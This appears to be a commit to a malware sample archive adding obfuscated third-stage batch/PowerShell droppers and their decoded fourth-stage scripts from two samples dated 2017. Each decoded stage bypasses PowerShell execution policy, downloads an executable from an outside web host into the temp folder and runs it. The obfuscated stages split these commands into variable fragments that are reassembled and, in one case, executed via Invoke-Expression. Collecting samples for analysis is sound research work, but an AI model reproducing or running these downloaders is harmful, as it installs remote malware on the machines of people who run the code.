Added the 3rd and 4th stage of the samples

malware/20170214/459867.3rdstage.bat

@@ -0,0 +1 @@
+cmd.exe /c "powershell  $yzpone='^tio';$qymgirp='^Dow';$ysdusy='^tro';$ovhyf='^=($';$igeqa='^-Ob';$zazne='^tar';$qwacoc='^em.';$uteqq='^ecu';$ycvupy='^(''h';$ydek='^yst';$icaq='^ess';$yrtux='^lic';$sdankulz='^env';$hsesel='^mp+';$mhyxtik='^ Pr';$abven='^ien';$nujek='^kem';$jequt='^-Ex';$ytydo='^ath';$omlyz='^y B';$ewoce='^nPo';$iskihme='^Net';$wvetzib='^roc';$yxbewe='^onf';$ajapo='^ath';$adliwn='^.co';$zpahifg='^t).';$yngas='^New';$ocuqca='^t-P';$zrutic='^:te';$ydsazt='^p-c';$ygduvlo='^ss ';$yluml='^xe''';$zusax='^oce';$iqqota='^ttp';$tane='^aas';$ighypw='^$pa';$elejce='^ $p';$kettel='^ile';$somuz='^m/w';$lsagbup='^nlo';$olsexo='^);(';$exnadna='^t S';$epcobf='^''\y';$pudum='^may';$ishykna='^bcl';$ygado='^adF';$yzykw='^-Sc';$bsempelg='^://';$exirr='^d.e';$afrylko='^.bg';$hpypo='^ss;';$igpofy='^th)';$hsepe='^t'',';$ewcabs='^ope';$ipab='^jec';$yqxop='^ $p';$sezpu='^ypa';$espevny='^Set';$juny='^.We';$fixsyb='^; S'; Invoke-Expression ($espevny+$jequt+$uteqq+$yzpone+$ewoce+$yrtux+$omlyz+$sezpu+$ygduvlo+$yzykw+$ewcabs+$mhyxtik+$zusax+$hpypo+$elejce+$ytydo+$ovhyf+$sdankulz+$zrutic+$hsesel+$epcobf+$nujek+$exirr+$yluml+$olsexo+$yngas+$igeqa+$ipab+$exnadna+$ydek+$qwacoc+$iskihme+$juny+$ishykna+$abven+$zpahifg+$qymgirp+$lsagbup+$ygado+$kettel+$ycvupy+$iqqota+$bsempelg+$pudum+$tane+$ysdusy+$adliwn+$somuz+$ydsazt+$yxbewe+$afrylko+$hsepe+$ighypw+$igpofy+$fixsyb+$zazne+$ocuqca+$wvetzib+$icaq+$yqxop+$ajapo);"

malware/20170214/459867.4thstage.ps1

@@ -0,0 +1 @@
+Set-ExecutionPolicy Bypass -Scope Process; $path=($env:temp+'\ykemd.exe');(New-Object System.Net.Webclient).DownloadFile('http://mayaastro.com/wp-conf.bgt',$path); Start-Process $path

malware/20170214/796423.3rdstage.bat

@@ -0,0 +1 @@
+cmd.exe /c "powershell  $fofy='^em.';$cqesjurv='^oce';$efewa='^; S';$fafy='^ $p';$ulryb='^Net';$iqury='^env';$itdomxy='^ Pr';$arsacki='^m/w';$mcogynn='^i.e';$yxyfw='^p-c';$oxmuz='^bcl';$sikvu='^(''h';$xbifi='^ss ';$fegef='^ypa';$bodbuk='^-Sc';$jabmod='^ath';$ebjos='^.bg';$emic='^Set';$jyne='^ope';$zvygwuf='^ $p';$kyxca='^ile';$taqso='^zus';$eqvin='^''\j';$gity='^);(';$bcazun='^nPo';$tdirro='^-Ob';$xbuqwum='^t'',';$avkas='^ecu';$pbetle='^.We';$qipqip='^nlo';$ffihrob='^tar';$pafti='^Dow';$amor='^t).';$vbexev='^tro';$abole='^ttp';$odapu='^lic';$vabvop='^ss;';$wkotpeg='^xe''';$igybp='^-Ex';$puswi='^roc';$dgiqe='^ath';$dquvagr='^onf';$afek='^.co';$niji='^yst';$egerb='^may';$ihyby='^jec';$fjina='^mp+';$pqary='^=($';$juqe='^th)';$gylce='^t S';$mryrwax='^:te';$dlyji='^y B';$fyqe='^://';$yrudmy='^ien';$hyksa='^$pa';$aricb='^t-P';$yqgammi='^tio';$zegferz='^New';$sucosf='^ess';$dipi='^aas';$revu='^adF'; Write-Host ($emic+$igybp+$avkas+$yqgammi+$bcazun+$odapu+$dlyji+$fegef+$xbifi+$bodbuk+$jyne+$itdomxy+$cqesjurv+$vabvop+$fafy+$jabmod+$pqary+$iqury+$mryrwax+$fjina+$eqvin+$taqso+$mcogynn+$wkotpeg+$gity+$zegferz+$tdirro+$ihyby+$gylce+$niji+$fofy+$ulryb+$pbetle+$oxmuz+$yrudmy+$amor+$pafti+$qipqip+$revu+$kyxca+$sikvu+$abole+$fyqe+$egerb+$dipi+$vbexev+$afek+$arsacki+$yxyfw+$dquvagr+$ebjos+$xbuqwum+$hyksa+$juqe+$efewa+$ffihrob+$aricb+$puswi+$sucosf+$zvygwuf+$dgiqe);"

malware/20170214/796423.4thstage.ps1

@@ -0,0 +1,2 @@
+
+Set-ExecutionPolicy Bypass -Scope Process; $path=($env:temp+'\jzusi.exe');(New-Object System.Net.Webclient).DownloadFile('http://mayaastro.com/wp-conf.bgt',$path); Start-Process $path